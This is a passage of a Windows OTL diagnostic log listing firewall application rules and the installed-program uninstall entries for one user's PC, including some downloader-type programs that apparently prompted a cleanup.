"{4F9BC34C-C1A0-4C66-9483-6436F6087CFA}" = protocol=6 | dir=in | app=c:\program files (x86)\hitsblender\hitsblender.exe |
"{4FF6CDF9-3CE3-481A-B816-46B0D5F303D1}" = dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"{5226944F-7C93-4923-A1D8-689A882BC2C1}" = protocol=6 | dir=in | app=c:\users\br\appdata\local\temp\7zs5c14\hppiw.exe |
"{53831088-7E43-48B6-AF9B-F9168730B84C}" = protocol=6 | dir=in | app=c:\users\br\appdata\local\temp\7zs50e8\hpdiagnosticcoreui.exe |
"{53838D03-6DC7-424B-8108-B9B281EBE197}" = dir=in | app=c:\program files\hp\hp officejet pro 8620\bin\sendafax.exe |
"{592BA79D-5526-49E8-8D16-D370E423B6B9}" = protocol=6 | dir=in | app=c:\users\br\appdata\local\temp\7zs3693\hpdiagnosticcoreui.exe |
"{6362F938-543C-4FA4-A6E8-CE95103E5D4C}" = dir=in | app=c:\program files\hp\hp officejet pro 8620\bin\faxapplications.exe |
"{6427A51C-464D-4E8D-9A7B-F6043B4210E5}" = protocol=6 | dir=in | app=c:\users\br\appdata\local\temp\7zs57b3\hpdiagnosticcoreui.exe |
"{6BB14731-6E61-491F-919B-BCFCC0C68781}" = protocol=6 | dir=out | app=c:\program files (x86)\rosetta stone\rosetta stone version 3\support\bin\win\rosettastoneltdservices.exe |
"{7CEE42D5-40AA-4FDC-99C5-F316023ACD15}" = protocol=17 | dir=in | app=c:\users\br\appdata\local\temp\7zs50e8\hpdiagnosticcoreui.exe |
"{8BC37589-873F-41BF-ADDC-A792B12E7F94}" = dir=in | app=c:\program files (x86)\rosetta stone\rosetta stone version 3\support\bin\win\rosettastoneltdservices.exe |
"{9183AA21-E3BA-446A-BDE2-6E4E80630DCD}" = dir=in | app=c:\program files (x86)\itunes\itunes.exe |
"{9F8AE5F5-AC53-4564-A655-A51FE7D185C9}" = protocol=17 | dir=in | app=c:\users\br\appdata\local\temp\7zs3693\hpdiagnosticcoreui.exe |
"{9FE93A00-5EB8-4BA2-8893-624CB974F413}" = protocol=6 | dir=in | app=c:\program files (x86)\yourfiledownloader\yourfiledownloader.exe |
"{A6486E9C-B7D5-4EDE-8777-B19B3413B956}" = protocol=1 | dir=out | [email protected],-28544 |
"{BA3D606A-38F8-49A0-B060-0F465865F1CC}" = protocol=17 | dir=in | app=c:\program files (x86)\yourfiledownloader\downloader.exe |
"{BABA50E2-1103-4E9D-BBF9-9271F305BD41}" = protocol=17 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{C3F603B3-C220-43F3-9890-5022B6E57107}" = protocol=17 | dir=in | app=c:\program files (x86)\trademanager\aliim.exe |
"{C9D278F4-D3D6-4A4D-A00E-03BC0990DA7C}" = protocol=6 | dir=in | app=c:\program files\bonjour\mdnsresponder.exe |
"{DD3E1109-A7F5-4AF5-94FF-0D9C4C4FDAA9}" = protocol=6 | dir=in | app=c:\users\br\downloads\free_download_bobcat_753_parts_manual_pdf_downloader.exe |
"{E271487A-4D40-4F87-812A-D27AC74D15F9}" = dir=in | app=c:\program files\hp\hp officejet pro 8620\bin\hpnetworkcommunicatorcom.exe |
"{E3671478-82FC-4B8E-9DDB-53DC8C2EAB88}" = protocol=58 | dir=in | [email protected],-28545 |
"{E7EB8D38-5EA8-4DA4-9F6D-B75FBF933E6D}" = dir=in | app=c:\program files (x86)\rosetta stone\rosetta stone version 3\rosettastoneversion3.exe |
"{F05820D3-0743-43E4-A082-AD1D1E6538EF}" = protocol=17 | dir=in | app=c:\program files (x86)\bonjour\mdnsresponder.exe |
"{F5DC4883-D3A7-41C3-BB13-32BB3505B818}" = protocol=58 | dir=out | [email protected],-28546 |
"{F77757F6-5809-4AA5-85A3-9E7339C77984}" = protocol=6 | dir=in | app=c:\program files (x86)\trademanager\aliim.exe |
"{FDA605CF-A706-4293-9944-DB37E6E446D3}" = protocol=17 | dir=in | app=c:\program files (x86)\hitsblender\hitsblender.exe |
"{FE277713-9F44-418E-921D-477E5CE40C84}" = protocol=6 | dir=in | app=c:\program files (x86)\research in motion\blackberry desktop\rim.desktop.exe |
"TCP Query User{40BA66C0-C3B3-48D9-A2EB-333CD56DB843}C:\windows\system32\wfs.exe" = protocol=6 | dir=in | app=c:\windows\system32\wfs.exe |
"TCP Query User{81EAE763-7EDB-482F-9FCD-BEE0A8CAC100}C:\users\br\appdata\local\akamai\netsession_win.exe" = protocol=6 | dir=in | app=c:\users\br\appdata\local\akamai\netsession_win.exe |
"TCP Query User{856D56DB-87A7-4923-9934-442D7DD4C4C2}C:\users\br\appdata\local\akamai\netsession_win.exe" = protocol=6 | dir=in | app=c:\users\br\appdata\local\akamai\netsession_win.exe |
"TCP Query User{931554B7-85FA-4EA3-B10A-6BEF180481C6}C:\_otl\movedfiles\01252014_063426\c_program files (x86)\trademanager\aliim.exe" = protocol=6 | dir=in | app=c:\_otl\movedfiles\01252014_063426\c_program files (x86)\trademanager\aliim.exe |
"TCP Query User{B61688A4-31B9-4B4A-9D7E-A381468F8A13}C:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartphoto.exe" = protocol=6 | dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartphoto.exe |
"TCP Query User{F6F58757-1D1B-47FC-9494-C7B65F7E4E81}C:\program files (x86)\trademanager\aliim.exe" = protocol=6 | dir=in | app=c:\program files (x86)\trademanager\aliim.exe |
"TCP Query User{F706814D-CC6C-4532-AAFE-47F00ACEAEBF}C:\program files (x86)\skype\phone\skype.exe" = protocol=6 | dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"UDP Query User{0FB6DDCA-8200-4624-B600-F3EB0A5BB18A}C:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartphoto.exe" = protocol=17 | dir=in | app=c:\program files (x86)\hewlett-packard\touchsmart\media\hptouchsmartphoto.exe |
"UDP Query User{10D8666C-B031-48EB-8FAC-13CFD635C7D8}C:\_otl\movedfiles\01252014_063426\c_program files (x86)\trademanager\aliim.exe" = protocol=17 | dir=in | app=c:\_otl\movedfiles\01252014_063426\c_program files (x86)\trademanager\aliim.exe |
"UDP Query User{129E2564-A80E-49B6-A5CF-4F9458CE32B7}C:\users\br\appdata\local\akamai\netsession_win.exe" = protocol=17 | dir=in | app=c:\users\br\appdata\local\akamai\netsession_win.exe |
"UDP Query User{3D088F22-C1AD-4ECF-A2CB-B151A5898562}C:\program files (x86)\trademanager\aliim.exe" = protocol=17 | dir=in | app=c:\program files (x86)\trademanager\aliim.exe |
"UDP Query User{961D5883-E1D4-4ECC-A5CD-3C91C196C75D}C:\program files (x86)\skype\phone\skype.exe" = protocol=17 | dir=in | app=c:\program files (x86)\skype\phone\skype.exe |
"UDP Query User{BC29D7CC-FDCF-4485-86DD-D2F2EB813B7F}C:\users\br\appdata\local\akamai\netsession_win.exe" = protocol=17 | dir=in | app=c:\users\br\appdata\local\akamai\netsession_win.exe |
"UDP Query User{E884B918-EED3-440A-819D-DB60559E98D3}C:\windows\system32\wfs.exe" = protocol=17 | dir=in | app=c:\windows\system32\wfs.exe |
 
========== HKEY_LOCAL_MACHINE Uninstall List ==========
 
64bit: [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{027E5FAB-1476-4C59-AAB4-32EF28520399}" = Windows Live Language Selector
"{02A5BD31-16AC-45DF-BE9F-A3167BC4AFB2}" = Windows Live Family Safety
"{05EFBF37-0E52-4579-875C-7EEF0DFB4FCB}" = Network64
"{071c9b48-7c32-4621-a0ac-3f809523288f}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{0D87AE67-14EB-4C10-88A5-DA6C3181EB18}" = Windows Live Family Safety
"{1ACC8FFB-9D84-4C05-A4DE-D28A9BC91698}" = Windows Live ID Sign-in Assistant
"{1D8E6291-B0D5-35EC-8441-6616F567A0F7}" = Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219
"{23F2C78C-E131-4CA0-8F84-3473FB7728BA}" = Microsoft Security Client
"{2AAF09D5-4B3F-4975-B6A9-ECE2631FC942}" = iCloud
"{2ABBBD91-91E5-4AD7-929A-FE15D1DC0576}" = iTunes
"{37B8F9C7-03FB-3253-8781-2517C99D7C00}" = Microsoft Visual C++ 2012 x64 Additional Runtime - 11.0.61030
"{455804F2-70A9-46BD-BEB8-957000EC20D4}" = SolidWorks eDrawings 2011 x64 Edition SP02
"{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148
"{4F113377-0BA1-4552-9ABB-9BF220FAF132}" = SolidWorks 2011 x64 Edition SP02
"{542DDF04-9F91-4F36-B2F4-2638B788A4C8}" = Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU
"{5783F2D7-9001-0409-0102-0060B0CE6BBA}" = AutoCAD 2011 - English
"{5783F2D7-9001-0409-1102-0060B0CE6BBA}" = AutoCAD 2011 Language Pack - English
"{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161
"{656DEEDE-F6AC-47CA-A568-A1B4E34B5760}" = Windows Live Remote Service Resources
"{6BB4E4E8-17B9-4534-8A8E-89E53F12769C}" = WD SmartWare
"{6BFAB6C1-6D46-46DB-A538-A269907C9F2F}" = Network64
"{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}" = Bonjour
"{7DEBE4EB-6B40-3766-BB35-5CBBC385DA37}" = Microsoft .NET Framework 4.5.1
"{8220EEFE-38CD-377E-8595-13398D740ACE}" = Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17
"{847B0532-55E3-4AAF-8D7B-E3A1A7CD17E5}" = Windows Live Remote Client Resources
"{88E60521-1E4E-4785-B9F1-1798A4BD0C30}" = HP MediaSmart SmartMenu
"{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
"{90120000-002A-0000-1000-0000000FF1CE}" = Microsoft Office Office 64-bit Components 2007
"{90120000-002A-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit MUI (English) 2007
"{90120000-0116-0409-1000-0000000FF1CE}" = Microsoft Office Shared 64-bit Setup Metadata MUI (English) 2007
"{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033" = Microsoft .NET Framework 4.5.1
"{9495AEB4-AB97-39DE-8C42-806EEF75ECA7}" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"{95120000-00B9-0409-1000-0000000FF1CE}" = Microsoft Application Error Reporting
"{99039186-EBEB-4127-BFA2-18B10A05ACE2}" = Product Improvement Study for HP Officejet Pro 8620
"{A977D10D-989A-40D4-B0B1-450954516543}" = HP Officejet Pro 8620 Basic Device Software
"{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}" = Microsoft Visual C++ 2005 Redistributable (x64)
"{BCA9334F-B6C9-4F65-9A73-AC5A329A4D04}" = PlayReady PC Runtime amd64
"{BDD99690-3541-4619-9D2A-3CDDB3E15F9E}" = Apple Mobile Device Support
"{C168639F-5810-4EC8-B1E8-0251AA8A771C}" = File Association Helper
"{CD95F661-A5C4-44F5-A6AA-ECDD91C240E5}" = WinZip 19.0
"{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}" = Microsoft Visual C++ 2012 x64 Minimum Runtime - 11.0.61030
"{DA54F80E-261C-41A2-A855-549A144F2F59}" = Windows Live MIME IFilter
"{DF6D988A-EEA0-4277-AAB8-158E086E439B}" = Windows Live Remote Client
"{E02A6548-6FDE-40E2-8ED9-119D7D7E641F}" = Windows Live Remote Service
"{E3047FA0-2D6B-4BD6-8CD4-599955F1CE9D}" = Microsoft Mouse and Keyboard Center
"{FF21C3E6-97FD-474F-9518-8DCBE94C2854}" = 64 Bit HP CIO Components Installer
"AutoCAD 2011 - English" = AutoCAD 2011 - English
"CCleaner" = CCleaner
"GIMP-2_is1" = GIMP 2.8.14
"HDMI" = Intel® Graphics Media Accelerator Driver
"HP Imaging Device Functions" = HP Imaging Device Functions 13.0
"HP Photosmart Essential" = HP Photosmart Essential 3.5
"HP Smart Web Printing" = HP Smart Web Printing 4.51
"HP Solution Center & Imaging Support Tools" = HP Solution Center 13.0
"HPExtendedCapabilities" = HP Customer Participation Program 13.0
"HPOCR" = OCR Software by I.R.I.S. 13.0
"Microsoft Mouse and Keyboard Center" = Microsoft Mouse and Keyboard Center
"Microsoft Security Client" = Microsoft Security Essentials
"Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU" = Microsoft Visual Studio 2005 Remote Debugger Light (x64) - ENU
"Microsoft Visual Studio 2010 Tools for Office Runtime (x64)" = Microsoft Visual Studio 2010 Tools for Office Runtime (x64)
"PC-Doctor for Windows" = Hardware Diagnostic Tools
"Shop for HP Supplies" = Shop for HP Supplies
"WinRAR archiver" = WinRAR 5.00 (64-bit)
 
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
"{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}" = PDFCreator
"{07FA4960-B038-49EB-891B-9F95930AA544}" = HP Customer Experience Enhancements
"{0B0F231F-CE6A-483D-AA23-77B364F75917}" = Windows Live Installer
"{0DEF8C02-2EAB-4BFE-A7E0-7990665DF1A9}" = C6100
"{0EF5BEA9-B9D3-46d7-8958-FB69A0BAEACC}" = Status
"{0F367CA3-3B2F-43F9-A44A-25A8EE69E45D}" = Scan
"{11F9A376-342F-4297-82DA-1F6EA8ED4B6B}" = PSE12 STI Installer
"{148E08FF-D7C4-46ED-8D4D-601C67FE0AFD}" = Rosetta Stone Version 3
"{175F0111-2968-4935-8F70-33108C6A4DE3}" = MarketResearch
"{17B4760F-334B-475D-829F-1A3E94A6A4E6}" = HP Setup
"{19BA08F7-C728-469C-8A35-BFBD3633BE08}" = Windows Live Movie Maker
"{1EC71BFB-01A3-4239-B6AF-B1AE656B15C0}" = TrayApp
"{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
"{1F6AB0E7-8CDD-4B93-8A23-AA9EB2FEFCE4}" = Junk Mail filter update
"{1FBF6C24-C1FD-4101-A42B-0C564F9E8E79}" = CyberLink DVD Suite Deluxe
"{200FEC62-3C34-4D60-9CE8-EC372E01C08F}" = Windows Live SOXE Definitions
"{24991BA0-F0EE-44AD-9CC8-5EC50AECF6B7}" = Skype™ 6.21
"{254C37AA-6B72-4300-84F6-98A82419187E}" = ActiveCheck component for HP Active Support Library
"{26A24AE4-039D-4CA4-87B4-2F03217071FF}" = Java 7 Update 71
"{2902F983-B4C1-44BA-B85D-5C6D52E2C441}" = Windows Live Mesh ActiveX Control for Remote Connections
"{2A3FC24C-6EC0-4519-A52B-FDA4EA9B2D24}" = Windows Live Messenger
"{2A7EF808-14F3-4E93-BE3A-1675EE5332A4}" = AIO_CDA_ProductContext
"{2d588de7-f4f6-4d6d-8719-32cbb9637e9e}" = WD SmartWare Installer
"{2EEA7AA4-C203-4b90-A34F-19FB7EF1C81C}" = BufferChm
"{2FF8C687-DB7D-4adc-A5DC-57983EC25046}" = DeviceDiscovery
"{3023EBDA-BF1B-4831-B347-E5018555F26E}" = Movie Theme Pack for HP MediaSmart Video
"{3336F667-9049-4D46-98B6-4C743EEBC5B1}" = Windows Live Photo Gallery
"{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}" = Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030
"{349E9132-5101-4094-859E-0EEE6F3DDCD5}" = SQLAnywhere1000
"{34F4D9A4-42C2-4348-BEF4-E553C84549E7}" = Windows Live Photo Gallery
"{3C92B2E6-380D-4fef-B4DF-4A3B4B669771}" = Copy
"{40BF1E83-20EB-11D8-97C5-0009C5020658}" = Power2Go
"{40FB8D7C-6FF8-4AF2-BC8B-0B1DB32AF04B}" = HP Advisor
"{415FA9AD-DA10-4ABE-97B6-5051D4795C90}" = HP FWUpdateEDO2
"{43CDF946-F5D9-4292-B006-BA0D92013021}" = WebReg
"{440B915A-0C85-45DB-92AE-75AE14704A64}" = Fax
"{44B2A0AB-412E-4F8C-B058-D1E8AECCDFF5}" = Recovery Manager
"{47BBA5AA-CA6F-4A41-858D-A7A776F29A8B}" = Google SketchUp 8
"{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
"{4A70EF07-7F88-4434-BB61-D1DE8AE93DD4}" = SolutionCenter
"{4BD5B5D2-406D-4bc5-BB10-2F0D1D367C95}" = c6100_Help
"{4D2A6330-2F8B-11E3-9C40-B8AC6F97B88E}" = Google Earth
"{4E7C28C7-D5DA-4E9F-A1CA-60490B54AE35}" = UnloadSupport
"{50816F92-1652-4A7C-B9BC-48F682742C4B}" = Messenger Companion
"{579684A4-DDD5-4CA3-9EA8-7BE7D9593DB4}" = Windows Live UX Platform Language Pack
"{5C6F884D-680C-448B-B4C9-22296EE1B206}" = Logitech Harmony Remote Software 7
"{5F590D74-AA75-410F-A778-3CDFCE12DCD4}" = SolidWorks Explorer 2011 SP02
"{634F79E1-2A41-4C40-9E8D-89EC740AC9D6}" = Logitech Harmony Remote Software (x86)
"{63FF21C9-A810-464F-B60A-3111747B1A6D}" = GPBaseService2
"{669D4A35-146B-4314-89F1-1AC3D7B88367}" = HPAsset component for HP Active Support Library
"{67C6633B-5A12-4955-A5E4-98D703F9AFA3}" = SolidWorks eDrawings 2011 SP02
"{681B698F-C997-42C3-B184-B489C6CA24C9}" = HPPhotoSmartDiscLabelContent1
"{682B3E4F-696A-42DE-A41C-4C07EA1678B4}" = Windows Live SOXE
"{6B2FFB21-AC88-45C3-9A7D-4BB3E744EC91}" = HPSSupply
"{6BBA26E9-AB03-4FE7-831A-3535584CA002}" = Toolbox
"{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}" = Microsoft Visual C++ 2005 Redistributable
"{730E03E4-350E-48E5-9D3E-4329903D454D}" = Itibiti RTC
"{741CFE3A-1C0B-4A7D-8E08-5D78C911C09D}" = HP Support Assistant
"{777B751F-C904-4BD7-8DFF-81F97A3C0BC5}" = Adobe Photoshop Elements 12
"{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}" = Apple Software Update
"{78A96B4C-A643-4D0F-98C2-A8E16A6669F9}" = Windows Live Messenger Companion Core
"{7E265513-8CDA-4631-B696-F40D983F3B07}_is1" = CDBurnerXP
"{7FC8C210-A319-4835-A87D-B935EFB4C148}" = Microsoft Live Search Toolbar
"{80F19EAA-44C4-47C2-AE87-1C7628E858D6}" = Logitech Harmony Remote Software 7
"{83C292B7-38A5-440B-A731-07070E81A64F}" = Windows Live PIMT Platform
"{83CAF0DE-8D3B-4C37-A631-2B8F16EC3031}" = Apple Application Support
"{8471021C-F529-43DE-84DF-3612E10F58C4}" = Remote Control USB Driver
"{8C6D6116-B724-4810-8F2D-D047E6B7D68E}" = Mesh Runtime
"{8DD46C6A-0056-4FEC-B70A-28BB16A1F11F}" = MSVCRT
"{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
"{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
"{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
"{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
"{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
"{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
"{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
"{90120000-001F-0409-0000-0000000FF1CE}_ENTERPRISE_{1FF96026-A04A-4C3E-B50A-BB7022654D0F}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
"{90120000-001F-040C-0000-0000000FF1CE}_ENTERPRISE_{71F055E8-E2C6-4214-BB3D-BFE03561B89E}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
"{90120000-001F-0C0A-0000-0000000FF1CE}_ENTERPRISE_{2314F9A1-126F-45CC-8A5E-DFAF866F3FBC}" = Microsoft Office Proofing Tools 2007 Service Pack 3 (SP3)
"{90120000-002A-0000-1000-0000000FF1CE}_ENTERPRISE_{664655D8-B9BB-455D-8A58-7EAF7B0B2862}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-002A-0409-1000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
"{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
"{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{6E107EB7-8B55-48BF-ACCB-199F86A2CD93}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
"{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
"{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
"{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-00A4-0409-0000-0000000FF1CE}" = Microsoft Office 2003 Web Components
"{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
"{90120000-00BA-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
"{90120000-0114-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
"{90120000-0115-0409-0000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0116-0409-1000-0000000FF1CE}_ENTERPRISE_{98333358-268C-4164-B6D4-C96DF5153727}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
"{90120000-0117-0409-0000-0000000FF1CE}_ENTERPRISE_{AAA19365-932B-49BD-8138-BE28CEE9C4B4}" = Microsoft Office 2007 Service Pack 3 (SP3)
"{90140000-2005-0000-0000-0000000FF1CE}" = Microsoft Office File Validation Add-In
"{912D30CF-F39E-4B31-AD9A-123C6B794EE2}" = HP Update
"{92EA4134-10D1-418A-91E1-5A0453131A38}" = Windows Live Movie Maker
"{951B0F30-9F1A-4BF6-B3DA-99EB0E917B1C}" = FARO LS 1.1.406.58
"{96D12EC9-720B-45FB-904C-36D6307A1C76}" = HP Support Solutions Framework
"{999052D7-44A2-49F8-9851-A3D2D297EE03}" = SMPIS
"{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
"{9A4D71AB-9C68-4702-A4A2-A4DB7B0FE270}" = HP Officejet Pro 8620 Help
"{9B362566-EC1B-4700-BB9C-EC661BDE2175}" = DocProc
"{9BE518E6-ECC6-35A9-88E4-87755C07200F}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161
"{9D56775A-93F3-44A3-8092-840E3826DE30}" = Windows Live Mail
"{9D80A7B7-DC01-485D-AE93-710D559B5C56}" = Elements 12 Organizer
"{9DEABCB6-B759-4D52-92F8-51B34A2B4D40}" = Autodesk Material Library 2011
"{A0C91188-C88F-4E86-93E6-CD7C9A266649}" = Windows Live Mesh
"{A726AE06-AAA3-43D1-87E3-70F510314F04}" = Windows Live Writer
"{A7AEE29F-839E-46B5-B347-6D430618129F}" = AIO_CDA_Software
"{A92DAB39-4E2C-4304-9AB6-BC44E68B55E2}" = Google Update Helper
"{A95E3E66-D5A4-404E-997D-02562AA492E8}" = WD Security
"{A9BDCA6B-3653-467B-AC83-94367DA3BFE3}" = Windows Live Photo Common
"{AAAFC670-569B-4A2F-82B4-42945E0DE3EF}" = Windows Live Writer
"{AAF454FC-82CA-4F29-AB31-6A109485E76E}" = Windows Live Writer
"{AC76BA86-0804-1033-1959-001802114130}" = Adobe Refresh Manager
"{AC76BA86-7AD7-1033-7B44-AB0000000001}" = Adobe Reader XI (11.0.10)
"{B175520C-86A2-35A7-8619-86DC379688B9}" = Microsoft Visual C++ 2012 x86 Additional Runtime - 11.0.61030
"{B281C7D1-C088-40E0-86EA-B2D9D7E0810A}" = Sentinel System Driver Installer 7.5.7
"{B2EE25B9-5B00-4ACF-94F0-92433C28C39E}" = HP MediaSmart Music/Photo/Video
"{B6465A32-8BE9-4B38-ADC5-4B4BDDC10B0D}" = HPDiagnosticAlert
"{B6CF2967-C81E-40C0-9815-C05774FEF120}" = Skype Click to Call
"{B8AC1A89-FFD1-4F97-8051-E505A160F562}" = HP Odometer
"{B9A03B7B-E0FF-4FB3-BA83-762E58A1B0AA}" = HP Support Information
"{BD7204BA-DD64-499E-9B55-6A282CDF4FA4}" = Destinations
"{BD95A8CD-1D9F-35AD-981A-3E7925026EBB}" = Microsoft Visual C++ 2012 x86 Minimum Runtime - 11.0.61030
"{C43326F5-F135-4551-8270-7F7ABA0462E1}" = HPProductAssistant
"{C59C179C-668D-49A9-B6EA-0121CCFC1243}" = LabelPrint
"{C611CF88-969D-43E6-A877-D6D6439DD081}" = HP Remote Solution
"{C66824E4-CBB3-4851-BB3F-E8CFD6350923}" = Windows Live Mail
"{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}" = Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030
"{CA6BCA2F-EDEB-408F-850B-31404BE16A61}" = I.R.I.S. OCR
"{CAE4213F-F797-439D-BD9E-79B71D115BE3}" = HPPhotoGadget
"{CB099890-1D5F-11D5-9EA9-0050BAE317E1}" = PowerDirector
"{CC8E94A2-55C7-4460-953C-2A790180578C}" = LightScribe System Software
"{CD1E078C-A6B9-47DA-B035-6365C85C7832}" = Autodesk Material Library 2011 Base Image library
"{CE95A79E-E4FC-4FFF-8A75-29F04B942FF2}" = Windows Live UX Platform
"{D0916F1D-236D-4B9A-BCEA-F535444DCA41}" = Photobucket Desktop
"{D0A3A97D-7918-4B0B-B91E-775E00C36122}" = WD Quick View
"{D0B44725-3666-492D-BEF6-587A14BD9BD9}" = MSVCRT_amd64
"{D436F577-1695-4D2F-8B44-AC76C99E0002}" = Windows Live Photo Common
"{D45240D3-B6B3-4FF9-B243-54ECE3E10066}" = Windows Live Communications Platform
"{D481EA96-2313-4A7C-98EE-710D1AF884AC}" = Microsoft Visual Studio 2005 Tools for Applications - ENU
"{D79113E7-274C-470B-BD46-01B10219DF6A}" = HPPhotosmartEssential
"{D7A4F897-B20A-42D0-862D-CB5F6DB7391D}" = Adobe Photoshop CC 2014
"{D86B0E2E-DF9A-441C-AF77-8D1A0FF00FA6}" = AIO_Scan
"{DC635845-46D3-404B-BCB1-FC4A91091AFA}" = SmartWebPrinting
"{DCCAD079-F92C-44DA-B258-624FC6517A5A}" = HP MediaSmart DVD
"{DDC8BDEE-DCAC-404D-8257-3E8D4B782467}" = Windows Live Writer Resources
"{DECDCB7C-58CC-4865-91AF-627F9798FE48}" = Windows Live Mesh
"{DF802C05-4660-418c-970C-B988ADB1D316}" = Microsoft Live Search Toolbar
"{E09C4DB7-630C-4F06-A631-8EA7239923AF}" = D3DX10
"{E5B21F11-6933-4E0B-A25C-7963E3C07D11}" = Windows Live Messenger
"{E61CFDDA-40DD-4400-95CA-12819C50B5C2}" = WD Drive Utilities
"{E68EADA6-63A4-F6D3-FE12-968B879F7AD6}" = Adobe Download Assistant
